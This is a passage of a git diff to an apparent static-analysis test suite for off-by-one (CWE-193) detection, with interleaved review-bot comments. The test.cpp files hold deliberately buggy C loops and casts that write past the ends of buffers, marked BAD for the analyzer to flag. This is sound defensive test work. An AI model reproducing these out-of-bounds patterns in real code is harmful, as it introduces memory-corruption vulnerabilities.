| test.cpp:69:14:69:19 | call to malloc | call to malloc | test.cpp:82:31:82:34 | size | size | +| test.cpp:93:14:93:14 | p | test.cpp:69:14:69:19 | call to malloc | test.cpp:93:14:93:14 | p | Off-by one error allocated at $@ bounded by $@. | test.cpp:69:14:69:19 | call to malloc | call to malloc | test.cpp:88:30:88:33 | size | size | +| test.cpp:93:14:93:14 | p | test.cpp:69:14:69:19 | call to malloc | test.cpp:93:14:93:14 | p | Off-by one error allocated at $@ bounded by $@. | test.cpp:69:14:69:19 | call to malloc | call to malloc | test.cpp:92:31:92:34 | size | size | edges | test.cpp:4:17:4:22 | call to malloc | test.cpp:4:17:4:22 | call to malloc | provenance | | | test.cpp:4:17:4:22 | call to malloc | test.cpp:6:9:6:11 | arr | provenance | | 
@@ -99,22 +118,3 @@ nodes | test.cpp:98:18:98:27 | test6_callee output argument [p] | semmle.label | test6_callee output argument [p] | subpaths | test.cpp:98:18:98:27 | *call to mk_array_p [p] | test.cpp:87:28:87:30 | *arr [p] | test.cpp:87:28:87:30 | *arr [p] | test.cpp:98:18:98:27 | test6_callee output argument [p] | -#select -| test.cpp:10:9:10:11 | arr | test.cpp:4:17:4:22 | call to malloc | test.cpp:10:9:10:11 | arr | Off-by one error allocated at $@ bounded by $@. | test.cpp:4:17:4:22 | call to malloc | call to malloc | test.cpp:4:24:4:27 | size | size | -| test.cpp:10:9:10:11 | arr | test.cpp:4:17:4:22 | call to malloc | test.cpp:10:9:10:11 | arr | Off-by one error allocated at $@ bounded by $@. | test.cpp:4:17:4:22 | call to malloc | call to malloc | test.cpp:4:24:4:27 | size | size | -| test.cpp:10:9:10:11 | arr | test.cpp:4:17:4:22 | call to malloc | test.cpp:10:9:10:11 | arr | Off-by one error allocated at $@ bounded by $@. | test.cpp:4:17:4:22 | call to malloc | call to malloc | test.cpp:5:25:5:28 | size | size | -| test.cpp:10:9:10:11 | arr | test.cpp:4:17:4:22 | call to malloc | test.cpp:10:9:10:11 | arr | Off-by one error allocated at $@ bounded by $@. | test.cpp:4:17:4:22 | call to malloc | call to malloc | test.cpp:9:26:9:29 | size | size | -| test.cpp:35:13:35:13 | p | test.cpp:21:13:21:18 | call to malloc | test.cpp:35:13:35:13 | p | Off-by one error allocated at $@ bounded by $@. | test.cpp:21:13:21:18 | call to malloc | call to malloc | test.cpp:30:29:30:32 | size | size | -| test.cpp:35:13:35:13 | p | test.cpp:21:13:21:18 | call to malloc | test.cpp:35:13:35:13 | p | Off-by one error allocated at $@ bounded by $@. | test.cpp:21:13:21:18 | call to malloc | call to malloc | test.cpp:34:30:34:33 | size | size | -| test.cpp:45:13:45:13 | p | test.cpp:21:13:21:18 | call to malloc | test.cpp:45:13:45:13 | p | Off-by one error allocated at $@ bounded by $@. 
| test.cpp:21:13:21:18 | call to malloc | call to malloc | test.cpp:40:29:40:32 | size | size | -| test.cpp:45:13:45:13 | p | test.cpp:21:13:21:18 | call to malloc | test.cpp:45:13:45:13 | p | Off-by one error allocated at $@ bounded by $@. | test.cpp:21:13:21:18 | call to malloc | call to malloc | test.cpp:44:30:44:33 | size | size | -| test.cpp:63:13:63:13 | p | test.cpp:55:13:55:18 | call to malloc | test.cpp:63:13:63:13 | p | Off-by one error allocated at $@ bounded by $@. | test.cpp:55:13:55:18 | call to malloc | call to malloc | test.cpp:55:20:55:23 | size | size | -| test.cpp:63:13:63:13 | p | test.cpp:55:13:55:18 | call to malloc | test.cpp:63:13:63:13 | p | Off-by one error allocated at $@ bounded by $@. | test.cpp:55:13:55:18 | call to malloc | call to malloc | test.cpp:55:20:55:23 | size | size | -| test.cpp:63:13:63:13 | p | test.cpp:55:13:55:18 | call to malloc | test.cpp:63:13:63:13 | p | Off-by one error allocated at $@ bounded by $@. | test.cpp:55:13:55:18 | call to malloc | call to malloc | test.cpp:56:5:56:19 | ... = ... | ... = ... | -| test.cpp:63:13:63:13 | p | test.cpp:55:13:55:18 | call to malloc | test.cpp:63:13:63:13 | p | Off-by one error allocated at $@ bounded by $@. | test.cpp:55:13:55:18 | call to malloc | call to malloc | test.cpp:56:5:56:19 | ... = ... | ... = ... | -| test.cpp:63:13:63:13 | p | test.cpp:55:13:55:18 | call to malloc | test.cpp:63:13:63:13 | p | Off-by one error allocated at $@ bounded by $@. | test.cpp:55:13:55:18 | call to malloc | call to malloc | test.cpp:56:16:56:19 | size | size | -| test.cpp:63:13:63:13 | p | test.cpp:55:13:55:18 | call to malloc | test.cpp:63:13:63:13 | p | Off-by one error allocated at $@ bounded by $@. | test.cpp:55:13:55:18 | call to malloc | call to malloc | test.cpp:58:29:58:32 | size | size | -| test.cpp:63:13:63:13 | p | test.cpp:55:13:55:18 | call to malloc | test.cpp:63:13:63:13 | p | Off-by one error allocated at $@ bounded by $@. 
| test.cpp:55:13:55:18 | call to malloc | call to malloc | test.cpp:62:30:62:33 | size | size | -| test.cpp:83:14:83:14 | p | test.cpp:69:14:69:19 | call to malloc | test.cpp:83:14:83:14 | p | Off-by one error allocated at $@ bounded by $@. | test.cpp:69:14:69:19 | call to malloc | call to malloc | test.cpp:82:31:82:34 | size | size | -| test.cpp:93:14:93:14 | p | test.cpp:69:14:69:19 | call to malloc | test.cpp:93:14:93:14 | p | Off-by one error allocated at $@ bounded by $@. | test.cpp:69:14:69:19 | call to malloc | call to malloc | test.cpp:88:30:88:33 | size | size | -| test.cpp:93:14:93:14 | p | test.cpp:69:14:69:19 | call to malloc | test.cpp:93:14:93:14 | p | Off-by one error allocated at $@ bounded by $@. | test.cpp:69:14:69:19 | call to malloc | call to malloc | test.cpp:92:31:92:34 | size | size | diff --git a/cpp/ql/test/experimental/query-tests/Security/CWE/CWE-193/array-access/ArrayAccessProductFlow.qlref b/cpp/ql/test/experimental/query-tests/Security/CWE/CWE-193/array-access/ArrayAccessProductFlow.qlref index 8186dd0721b7..0bcfeb909556 100644 --- a/cpp/ql/test/experimental/query-tests/Security/CWE/CWE-193/array-access/ArrayAccessProductFlow.qlref +++ b/cpp/ql/test/experimental/query-tests/Security/CWE/CWE-193/array-access/ArrayAccessProductFlow.qlref @@ -1 +1,2 @@ -experimental/Likely Bugs/ArrayAccessProductFlow.ql +query: experimental/Likely Bugs/ArrayAccessProductFlow.ql +postprocess: utils/test/InlineExpectationsTestQuery.ql diff --git a/cpp/ql/test/experimental/query-tests/Security/CWE/CWE-193/array-access/test.cpp b/cpp/ql/test/experimental/query-tests/Security/CWE/CWE-193/array-access/test.cpp index 12fc89470649..552b9070a30b 100644 --- a/cpp/ql/test/experimental/query-tests/Security/CWE/CWE-193/array-access/test.cpp +++ b/cpp/ql/test/experimental/query-tests/Security/CWE/CWE-193/array-access/test.cpp 
@@ -1,13 +1,13 @@ char *malloc(int size); void test1(int size) { - char *arr = malloc(size); + char *arr = malloc(size); // $ Source for (int i = 0; i < size; i++) { arr[i] = 0; // GOOD } for (int i = 0; i <= size; i++) { - arr[i] = i; // BAD + arr[i] = i; // BAD // $ Alert } } @@ -18,7 +18,7 @@ typedef struct { array_t mk_array(int size) { array_t arr; - arr.p = malloc(size); + arr.p = malloc(size); // $ Source arr.size = size; return arr; @@ -32,7 +32,7 @@ void test2(int size) { } for (int i = 0; i <= arr.size; i++) { - arr.p[i] = i; // BAD + arr.p[i] = i; // BAD // $ Alert } } @@ -42,7 +42,7 @@ void test3_callee(array_t arr) { } for (int i = 0; i <= arr.size; i++) { - arr.p[i] = i; // BAD + arr.p[i] = i; // BAD // $ Alert } } @@ -52,7 +52,7 @@ void test3(int size) { void test4(int size) { array_t arr; - arr.p = malloc(size); + arr.p = malloc(size); // $ Source arr.size = size; for (int i = 0; i < arr.size; i++) { @@ -60,13 +60,13 @@ void test4(int size) { } for (int i = 0; i <= arr.size; i++) { - arr.p[i] = i; // BAD + arr.p[i] = i; // BAD // $ Alert } } array_t *mk_array_p(int size) { array_t *arr = (array_t*) malloc(sizeof(array_t)); - arr->p = malloc(size); + arr->p = malloc(size); // $ Source arr->size = size; return arr; @@ -80,7 +80,7 @@ void test5(int size) { } for (int i = 0; i <= arr->size; i++) { - arr->p[i] = i; // BAD + arr->p[i] = i; // BAD // $ Alert } } @@ -90,7 +90,7 @@ void test6_callee(array_t *arr) { } for (int i = 0; i <= arr->size; i++) { - arr->p[i] = i; // BAD + arr->p[i] = i; // BAD // $ Alert } } diff --git a/cpp/ql/test/experimental/query-tests/Security/CWE/CWE-193/constant-size/ConstantSizeArrayOffByOne.expected b/cpp/ql/test/experimental/query-tests/Security/CWE/CWE-193/constant-size/ConstantSizeArrayOffByOne.expected index a4c154c06940..1aa7c546e12e 100644 --- a/cpp/ql/test/experimental/query-tests/Security/CWE/CWE-193/constant-size/ConstantSizeArrayOffByOne.expected 
+++ b/cpp/ql/test/experimental/query-tests/Security/CWE/CWE-193/constant-size/ConstantSizeArrayOffByOne.expected 
@@ -1,3 +1,25 @@ +#select +| test.cpp:35:5:35:22 | PointerAdd: access to array | test.cpp:35:10:35:12 | buf | test.cpp:35:5:35:22 | access to array | This pointer arithmetic may have an off-by-1 error allowing it to overrun $@ at this $@. | test.cpp:15:9:15:11 | buf | buf | test.cpp:35:5:35:26 | Store: ... = ... | write | +| test.cpp:36:5:36:24 | PointerAdd: access to array | test.cpp:36:10:36:12 | buf | test.cpp:36:5:36:24 | access to array | This pointer arithmetic may have an off-by-2 error allowing it to overrun $@ at this $@. | test.cpp:15:9:15:11 | buf | buf | test.cpp:36:5:36:28 | Store: ... = ... | write | +| test.cpp:43:9:43:19 | PointerAdd: access to array | test.cpp:43:14:43:16 | buf | test.cpp:43:9:43:19 | access to array | This pointer arithmetic may have an off-by-1 error allowing it to overrun $@ at this $@. | test.cpp:15:9:15:11 | buf | buf | test.cpp:43:9:43:23 | Store: ... = ... | write | +| test.cpp:49:5:49:22 | PointerAdd: access to array | test.cpp:49:10:49:12 | buf | test.cpp:49:5:49:22 | access to array | This pointer arithmetic may have an off-by-1 error allowing it to overrun $@ at this $@. | test.cpp:19:9:19:11 | buf | buf | test.cpp:49:5:49:26 | Store: ... = ... | write | +| test.cpp:50:5:50:24 | PointerAdd: access to array | test.cpp:50:10:50:12 | buf | test.cpp:50:5:50:24 | access to array | This pointer arithmetic may have an off-by-2 error allowing it to overrun $@ at this $@. | test.cpp:19:9:19:11 | buf | buf | test.cpp:50:5:50:28 | Store: ... = ... | write | +| test.cpp:57:9:57:19 | PointerAdd: access to array | test.cpp:57:14:57:16 | buf | test.cpp:57:9:57:19 | access to array | This pointer arithmetic may have an off-by-1 error allowing it to overrun $@ at this $@. | test.cpp:19:9:19:11 | buf | buf | test.cpp:57:9:57:23 | Store: ... = ... 
| write | +| test.cpp:61:9:61:19 | PointerAdd: access to array | test.cpp:61:14:61:16 | buf | test.cpp:61:9:61:19 | access to array | This pointer arithmetic may have an off-by-2 error allowing it to overrun $@ at this $@. | test.cpp:19:9:19:11 | buf | buf | test.cpp:61:9:61:23 | Store: ... = ... | write | +| test.cpp:72:5:72:15 | PointerAdd: access to array | test.cpp:79:32:79:34 | buf | test.cpp:72:5:72:15 | access to array | This pointer arithmetic may have an off-by-1 error allowing it to overrun $@ at this $@. | test.cpp:15:9:15:11 | buf | buf | test.cpp:72:5:72:19 | Store: ... = ... | write | +| test.cpp:77:27:77:44 | PointerAdd: access to array | test.cpp:77:32:77:34 | buf | test.cpp:66:32:66:32 | p | This pointer arithmetic may have an off-by-1 error allowing it to overrun $@ at this $@. | test.cpp:15:9:15:11 | buf | buf | test.cpp:67:5:67:10 | Store: ... = ... | write | +| test.cpp:88:5:88:27 | PointerAdd: access to array | test.cpp:85:34:85:36 | buf | test.cpp:88:5:88:27 | access to array | This pointer arithmetic may have an off-by-1 error allowing it to overrun $@ at this $@. | test.cpp:15:9:15:11 | buf | buf | test.cpp:88:5:88:31 | Store: ... = ... | write | +| test.cpp:128:9:128:14 | PointerAdd: access to array | test.cpp:128:9:128:11 | arr | test.cpp:128:9:128:14 | access to array | This pointer arithmetic may have an off-by-1 error allowing it to overrun $@ at this $@. | test.cpp:125:11:125:13 | arr | arr | test.cpp:128:9:128:18 | Store: ... = ... | write | +| test.cpp:136:9:136:16 | PointerAdd: ... += ... | test.cpp:143:18:143:21 | asdf | test.cpp:138:13:138:15 | arr | This pointer arithmetic may have an off-by-2 error allowing it to overrun $@ at this $@. | test.cpp:142:10:142:13 | asdf | asdf | test.cpp:138:12:138:15 | Load: * ... | read | +| test.cpp:156:12:156:18 | PointerAdd: ... + ... | test.cpp:156:12:156:14 | buf | test.cpp:147:4:147:9 | -- ... | This pointer arithmetic may have an off-by-1 error allowing it to overrun $@ at this $@. 
| test.cpp:154:7:154:9 | buf | buf | test.cpp:147:3:147:13 | Store: ... = ... | write | +| test.cpp:156:12:156:18 | PointerAdd: ... + ... | test.cpp:156:12:156:14 | buf | test.cpp:147:4:147:9 | -- ... | This pointer arithmetic may have an off-by-1 error allowing it to overrun $@ at this $@. | test.cpp:154:7:154:9 | buf | buf | test.cpp:147:3:147:13 | Store: ... = ... | write | +| test.cpp:221:5:221:11 | PointerAdd: access to array | test.cpp:218:23:218:28 | buffer | test.cpp:221:5:221:11 | access to array | This pointer arithmetic may have an off-by-1 error allowing it to overrun $@ at this $@. | test.cpp:217:19:217:24 | buffer | buffer | test.cpp:221:5:221:15 | Store: ... = ... | write | +| test.cpp:232:5:232:10 | PointerAdd: access to array | test.cpp:229:25:229:29 | array | test.cpp:232:5:232:10 | access to array | This pointer arithmetic may have an off-by-1 error allowing it to overrun $@ at this $@. | test.cpp:228:10:228:14 | array | array | test.cpp:232:5:232:19 | Store: ... = ... | write | +| test.cpp:261:27:261:30 | PointerAdd: access to array | test.cpp:286:19:286:25 | buffer2 | test.cpp:261:27:261:30 | access to array | This pointer arithmetic may have an off-by-1 error allowing it to overrun $@ at this $@. | test.cpp:285:19:285:25 | buffer2 | buffer2 | test.cpp:261:27:261:30 | Load: access to array | read | +| test.cpp:299:16:299:21 | PointerAdd: access to array | test.cpp:309:20:309:23 | arr2 | test.cpp:299:16:299:21 | access to array | This pointer arithmetic may have an off-by-1014 error allowing it to overrun $@ at this $@. | test.cpp:308:9:308:12 | arr2 | arr2 | test.cpp:299:16:299:21 | Load: access to array | read | +| test.cpp:322:19:322:27 | PointerAdd: ... + ... | test.cpp:322:19:322:22 | temp | test.cpp:325:24:325:26 | end | This pointer arithmetic may have an off-by-1 error allowing it to overrun $@ at this $@. | test.cpp:314:10:314:13 | temp | temp | test.cpp:330:13:330:24 | Store: ... = ... 
| write | +| test.cpp:322:19:322:27 | PointerAdd: ... + ... | test.cpp:322:19:322:22 | temp | test.cpp:325:24:325:26 | end | This pointer arithmetic may have an off-by-1 error allowing it to overrun $@ at this $@. | test.cpp:314:10:314:13 | temp | temp | test.cpp:331:13:331:24 | Store: ... = ... | write | +| test.cpp:322:19:322:27 | PointerAdd: ... + ... | test.cpp:322:19:322:22 | temp | test.cpp:325:24:325:26 | end | This pointer arithmetic may have an off-by-1 error allowing it to overrun $@ at this $@. | test.cpp:314:10:314:13 | temp | temp | test.cpp:333:13:333:24 | Store: ... = ... | write | edges | test.cpp:34:10:34:12 | buf | test.cpp:34:5:34:24 | access to array | provenance | Config | | test.cpp:35:10:35:12 | buf | test.cpp:35:5:35:22 | access to array | provenance | Config | 
@@ -178,25 +200,3 @@ nodes | test.cpp:325:24:325:26 | end | semmle.label | end | | test.cpp:325:24:325:26 | end | semmle.label | end | subpaths -#select -| test.cpp:35:5:35:22 | PointerAdd: access to array | test.cpp:35:10:35:12 | buf | test.cpp:35:5:35:22 | access to array | This pointer arithmetic may have an off-by-1 error allowing it to overrun $@ at this $@. | test.cpp:15:9:15:11 | buf | buf | test.cpp:35:5:35:26 | Store: ... = ... | write | -| test.cpp:36:5:36:24 | PointerAdd: access to array | test.cpp:36:10:36:12 | buf | test.cpp:36:5:36:24 | access to array | This pointer arithmetic may have an off-by-2 error allowing it to overrun $@ at this $@. | test.cpp:15:9:15:11 | buf | buf | test.cpp:36:5:36:28 | Store: ... = ... | write | -| test.cpp:43:9:43:19 | PointerAdd: access to array | test.cpp:43:14:43:16 | buf | test.cpp:43:9:43:19 | access to array | This pointer arithmetic may have an off-by-1 error allowing it to overrun $@ at this $@. | test.cpp:15:9:15:11 | buf | buf | test.cpp:43:9:43:23 | Store: ... = ... | write | -| test.cpp:49:5:49:22 | PointerAdd: access to array | test.cpp:49:10:49:12 | buf | test.cpp:49:5:49:22 | access to array | This pointer arithmetic may have an off-by-1 error allowing it to overrun $@ at this $@. | test.cpp:19:9:19:11 | buf | buf | test.cpp:49:5:49:26 | Store: ... = ... | write | -| test.cpp:50:5:50:24 | PointerAdd: access to array | test.cpp:50:10:50:12 | buf | test.cpp:50:5:50:24 | access to array | This pointer arithmetic may have an off-by-2 error allowing it to overrun $@ at this $@. | test.cpp:19:9:19:11 | buf | buf | test.cpp:50:5:50:28 | Store: ... = ... | write | -| test.cpp:57:9:57:19 | PointerAdd: access to array | test.cpp:57:14:57:16 | buf | test.cpp:57:9:57:19 | access to array | This pointer arithmetic may have an off-by-1 error allowing it to overrun $@ at this $@. | test.cpp:19:9:19:11 | buf | buf | test.cpp:57:9:57:23 | Store: ... = ... 
| write | -| test.cpp:61:9:61:19 | PointerAdd: access to array | test.cpp:61:14:61:16 | buf | test.cpp:61:9:61:19 | access to array | This pointer arithmetic may have an off-by-2 error allowing it to overrun $@ at this $@. | test.cpp:19:9:19:11 | buf | buf | test.cpp:61:9:61:23 | Store: ... = ... | write | -| test.cpp:72:5:72:15 | PointerAdd: access to array | test.cpp:79:32:79:34 | buf | test.cpp:72:5:72:15 | access to array | This pointer arithmetic may have an off-by-1 error allowing it to overrun $@ at this $@. | test.cpp:15:9:15:11 | buf | buf | test.cpp:72:5:72:19 | Store: ... = ... | write | -| test.cpp:77:27:77:44 | PointerAdd: access to array | test.cpp:77:32:77:34 | buf | test.cpp:66:32:66:32 | p | This pointer arithmetic may have an off-by-1 error allowing it to overrun $@ at this $@. | test.cpp:15:9:15:11 | buf | buf | test.cpp:67:5:67:10 | Store: ... = ... | write | -| test.cpp:88:5:88:27 | PointerAdd: access to array | test.cpp:85:34:85:36 | buf | test.cpp:88:5:88:27 | access to array | This pointer arithmetic may have an off-by-1 error allowing it to overrun $@ at this $@. | test.cpp:15:9:15:11 | buf | buf | test.cpp:88:5:88:31 | Store: ... = ... | write | -| test.cpp:128:9:128:14 | PointerAdd: access to array | test.cpp:128:9:128:11 | arr | test.cpp:128:9:128:14 | access to array | This pointer arithmetic may have an off-by-1 error allowing it to overrun $@ at this $@. | test.cpp:125:11:125:13 | arr | arr | test.cpp:128:9:128:18 | Store: ... = ... | write | -| test.cpp:136:9:136:16 | PointerAdd: ... += ... | test.cpp:143:18:143:21 | asdf | test.cpp:138:13:138:15 | arr | This pointer arithmetic may have an off-by-2 error allowing it to overrun $@ at this $@. | test.cpp:142:10:142:13 | asdf | asdf | test.cpp:138:12:138:15 | Load: * ... | read | -| test.cpp:156:12:156:18 | PointerAdd: ... + ... | test.cpp:156:12:156:14 | buf | test.cpp:147:4:147:9 | -- ... | This pointer arithmetic may have an off-by-1 error allowing it to overrun $@ at this $@. 
| test.cpp:154:7:154:9 | buf | buf | test.cpp:147:3:147:13 | Store: ... = ... | write | -| test.cpp:156:12:156:18 | PointerAdd: ... + ... | test.cpp:156:12:156:14 | buf | test.cpp:147:4:147:9 | -- ... | This pointer arithmetic may have an off-by-1 error allowing it to overrun $@ at this $@. | test.cpp:154:7:154:9 | buf | buf | test.cpp:147:3:147:13 | Store: ... = ... | write | -| test.cpp:221:5:221:11 | PointerAdd: access to array | test.cpp:218:23:218:28 | buffer | test.cpp:221:5:221:11 | access to array | This pointer arithmetic may have an off-by-1 error allowing it to overrun $@ at this $@. | test.cpp:217:19:217:24 | buffer | buffer | test.cpp:221:5:221:15 | Store: ... = ... | write | -| test.cpp:232:5:232:10 | PointerAdd: access to array | test.cpp:229:25:229:29 | array | test.cpp:232:5:232:10 | access to array | This pointer arithmetic may have an off-by-1 error allowing it to overrun $@ at this $@. | test.cpp:228:10:228:14 | array | array | test.cpp:232:5:232:19 | Store: ... = ... | write | -| test.cpp:261:27:261:30 | PointerAdd: access to array | test.cpp:286:19:286:25 | buffer2 | test.cpp:261:27:261:30 | access to array | This pointer arithmetic may have an off-by-1 error allowing it to overrun $@ at this $@. | test.cpp:285:19:285:25 | buffer2 | buffer2 | test.cpp:261:27:261:30 | Load: access to array | read | -| test.cpp:299:16:299:21 | PointerAdd: access to array | test.cpp:309:20:309:23 | arr2 | test.cpp:299:16:299:21 | access to array | This pointer arithmetic may have an off-by-1014 error allowing it to overrun $@ at this $@. | test.cpp:308:9:308:12 | arr2 | arr2 | test.cpp:299:16:299:21 | Load: access to array | read | -| test.cpp:322:19:322:27 | PointerAdd: ... + ... | test.cpp:322:19:322:22 | temp | test.cpp:325:24:325:26 | end | This pointer arithmetic may have an off-by-1 error allowing it to overrun $@ at this $@. | test.cpp:314:10:314:13 | temp | temp | test.cpp:330:13:330:24 | Store: ... = ... 
| write | -| test.cpp:322:19:322:27 | PointerAdd: ... + ... | test.cpp:322:19:322:22 | temp | test.cpp:325:24:325:26 | end | This pointer arithmetic may have an off-by-1 error allowing it to overrun $@ at this $@. | test.cpp:314:10:314:13 | temp | temp | test.cpp:331:13:331:24 | Store: ... = ... | write | -| test.cpp:322:19:322:27 | PointerAdd: ... + ... | test.cpp:322:19:322:22 | temp | test.cpp:325:24:325:26 | end | This pointer arithmetic may have an off-by-1 error allowing it to overrun $@ at this $@. | test.cpp:314:10:314:13 | temp | temp | test.cpp:333:13:333:24 | Store: ... = ... | write | diff --git a/cpp/ql/test/experimental/query-tests/Security/CWE/CWE-193/constant-size/ConstantSizeArrayOffByOne.qlref b/cpp/ql/test/experimental/query-tests/Security/CWE/CWE-193/constant-size/ConstantSizeArrayOffByOne.qlref index 082e8951c70d..3be7645c1a87 100644 --- a/cpp/ql/test/experimental/query-tests/Security/CWE/CWE-193/constant-size/ConstantSizeArrayOffByOne.qlref +++ b/cpp/ql/test/experimental/query-tests/Security/CWE/CWE-193/constant-size/ConstantSizeArrayOffByOne.qlref @@ -1 +1,2 @@ -experimental/Security/CWE/CWE-193/ConstantSizeArrayOffByOne.ql +query: experimental/Security/CWE/CWE-193/ConstantSizeArrayOffByOne.ql +postprocess: utils/test/InlineExpectationsTestQuery.ql diff --git a/cpp/ql/test/experimental/query-tests/Security/CWE/CWE-193/constant-size/test.cpp b/cpp/ql/test/experimental/query-tests/Security/CWE/CWE-193/constant-size/test.cpp index 03de927073a3..2c458170a51f 100644 --- a/cpp/ql/test/experimental/query-tests/Security/CWE/CWE-193/constant-size/test.cpp +++ b/cpp/ql/test/experimental/query-tests/Security/CWE/CWE-193/constant-size/test.cpp 
@@ -32,60 +32,60 @@ void testOneArray(OneArray *arr) { void testBig(BigArray *arr) { arr->buf[MAX_SIZE-1] = 0; // GOOD - arr->buf[MAX_SIZE] = 0; // BAD - arr->buf[MAX_SIZE+1] = 0; // BAD + arr->buf[MAX_SIZE] = 0; // BAD // $ Alert + arr->buf[MAX_SIZE+1] = 0; // BAD // $ Alert for(int i = 0; i < MAX_SIZE; i++) { arr->buf[i] = 0; // GOOD } for(int i = 0; i <= MAX_SIZE; i++) { - arr->buf[i] = 0; // BAD + arr->buf[i] = 0; // BAD // $ Alert } } void testFields(ArrayAndFields *arr) { arr->buf[MAX_SIZE-1] = 0; // GOOD - arr->buf[MAX_SIZE] = 0; // BAD? - arr->buf[MAX_SIZE+1] = 0; // BAD? + arr->buf[MAX_SIZE] = 0; // BAD? // $ Alert + arr->buf[MAX_SIZE+1] = 0; // BAD? // $ Alert for(int i = 0; i < MAX_SIZE; i++) { arr->buf[i] = 0; // GOOD } for(int i = 0; i <= MAX_SIZE; i++) { - arr->buf[i] = 0; // BAD? + arr->buf[i] = 0; // BAD? // $ Alert } for(int i = 0; i < MAX_SIZE+2; i++) { - arr->buf[i] = 0; // BAD? + arr->buf[i] = 0; // BAD? // $ Alert } // is this different if it's a memcpy? } -void assignThroughPointer(int *p) { +void assignThroughPointer(int *p) { // $ Sink *p = 0; // ??? should the result go at a flow source? } void addToPointerAndAssign(int *p) { p[MAX_SIZE-1] = 0; // GOOD - p[MAX_SIZE] = 0; // BAD + p[MAX_SIZE] = 0; // BAD // $ Alert } void testInterproc(BigArray *arr) { assignThroughPointer(&arr->buf[MAX_SIZE-1]); // GOOD - assignThroughPointer(&arr->buf[MAX_SIZE]); // BAD + assignThroughPointer(&arr->buf[MAX_SIZE]); // BAD // $ Alert - addToPointerAndAssign(arr->buf); + addToPointerAndAssign(arr->buf); // $ Source } #define MAX_SIZE_BYTES 4096 void testCharIndex(BigArray *arr) { - char *charBuf = (char*) arr->buf; + char *charBuf = (char*) arr->buf; // $ Source charBuf[MAX_SIZE_BYTES - 1] = 0; // GOOD - charBuf[MAX_SIZE_BYTES] = 0; // BAD + charBuf[MAX_SIZE_BYTES] = 0; // BAD // $ Alert } void testEqRefinement() { 
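Review bot: The four converted lines in `testFields` keep the undecided `// BAD?` marker while now pinning a result, e.g. `arr->buf[MAX_SIZE] = 0; // BAD? // $ Alert`, so the test asserts an alert that its own comment still questions. The layout of `ArrayAndFields` is outside this hunk, but an index of `MAX_SIZE` is past the end of `buf` whatever member follows it. If these are intended detections, I would settle the comment as `// BAD: past the end of buf, even if it lands in a later field // $ Alert`. If they are accepted noise, mark them `// $ SPURIOUS: Alert` instead.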
@@ -125,7 +125,7 @@ void testStackAllocated() { char *arr[MAX_SIZE]; for(int i = 0; i <= MAX_SIZE; i++) { - arr[i] = 0; // BAD + arr[i] = 0; // BAD // $ Alert } } @@ -133,18 +133,18 @@ int strncmp(const char*, const char*, int); char testStrncmp2(char *arr) { if(strncmp(arr, "", 6) == 0) { - arr += 6; + arr += 6; // $ Alert } - return *arr; // GOOD [FALSE POSITIVE] + return *arr; // GOOD [FALSE POSITIVE] // $ Sink } void testStrncmp1() { char asdf[5]; - testStrncmp2(asdf); + testStrncmp2(asdf); // $ Source } void countdownBuf1(int **p) { - *--(*p) = 1; // GOOD [FALSE POSITIVE] + *--(*p) = 1; // GOOD [FALSE POSITIVE] // $ Sink *--(*p) = 2; // GOOD *--(*p) = 3; // GOOD *--(*p) = 4; // GOOD @@ -153,7 +153,7 @@ void countdownBuf1(int **p) { void countdownBuf2() { int buf[4]; - int *x = buf + 4; + int *x = buf + 4; // $ Alert countdownBuf1(&x); } @@ -215,10 +215,10 @@ int countdownLength2() { void pointer_size_larger_than_array_element_size() { unsigned char buffer[100]; // getByteSize() = 100 - int *ptr = (int *)buffer; // pai.getElementSize() will be sizeof(int) = 4 -> size = 25 + int *ptr = (int *)buffer; // pai.getElementSize() will be sizeof(int) = 4 -> size = 25 // $ Source ptr[24] = 0; // GOOD: writes bytes 96, 97, 98, 99 - ptr[25] = 0; // BAD: writes bytes 100, 101, 102, 103 + ptr[25] = 0; // BAD: writes bytes 100, 101, 102, 103 // $ Alert } struct vec2 { int x, y; }; @@ -226,10 +226,10 @@ struct vec3 { int x, y, z; }; void pointer_size_smaller_than_array_element_size_but_does_not_divide_it() { vec3 array[3]; // getByteSize() = 9 * sizeof(int) - vec2 *ptr = (vec2 *)array; // pai.getElementSize() will be 2 * sizeof(int) -> size = 4 + vec2 *ptr = (vec2 *)array; // pai.getElementSize() will be 2 * sizeof(int) -> size = 4 // $ Source ptr[3] = vec2{}; // GOOD: writes ints 6, 7 - ptr[4] = vec2{}; // BAD: writes ints 8, 9 + ptr[4] = vec2{}; // BAD: writes ints 8, 9 // $ Alert } void pointer_size_larger_than_array_element_size_and_does_not_divide_it() { 
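Review bot: Results that this file's own comments label `GOOD [FALSE POSITIVE]` are pinned with a plain `Alert` tag, so the annotations no longer separate accepted false positives from real out-of-bounds findings. In the `@@ -133,18` hunk the path ending at `return *arr; // GOOD [FALSE POSITIVE] // $ Sink` is asserted by `arr += 6; // $ Alert`, and the `countdownBuf1` path by `int *x = buf + 4; // $ Alert` in the `@@ -153,7` hunk. I would write these as `arr += 6; // $ SPURIOUS: Alert` and `int *x = buf + 4; // $ SPURIOUS: Alert`. The same applies to the `p[2]`, `sum += arr[i]` and `end = temp + 64` lines in the `@@ -258,7`, `@@ -296,7` and `@@ -319,10` hunks.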
@@ -258,7 +258,7 @@ void call_use(unsigned char* p, int n) { if(n == 3) { unsigned char x = p[0]; unsigned char y = p[1]; - unsigned char z = p[2]; // GOOD [FALSE POSITIVE]: `call_use(buffer2, 2)` won't reach this point. + unsigned char z = p[2]; // GOOD [FALSE POSITIVE]: `call_use(buffer2, 2)` won't reach this point. // $ Alert use(x, y, z); } } @@ -283,7 +283,7 @@ void test_call_use2() { call_call_use(buffer1,1); unsigned char buffer2[2]; - call_call_use(buffer2,2); + call_call_use(buffer2,2); // $ Source unsigned char buffer3[3]; call_call_use(buffer3,3); @@ -296,7 +296,7 @@ int guardingCallee(int *arr, int size) { int sum; for (int i = 0; i < size; i++) { - sum += arr[i]; // GOOD [FALSE POSITIVE] - guarded by size + sum += arr[i]; // GOOD [FALSE POSITIVE] - guarded by size // $ Alert } return sum; } @@ -306,7 +306,7 @@ int guardingCaller() { guardingCallee(arr1, MAX_SIZE); int arr2[10]; - guardingCallee(arr2, 10); + guardingCallee(arr2, 10); // $ Source } // simplified md5 padding @@ -319,10 +319,10 @@ void correlatedCondition(int num) { end = temp + 56; } else if (num < 64) { - end = temp + 64; // GOOD [FALSE POSITVE] + end = temp + 64; // GOOD [FALSE POSITVE] // $ Alert } char *temp2 = temp + num; - while(temp2 != end) { + while(temp2 != end) { // $ Sink *temp2 = 0; temp2++; } diff --git 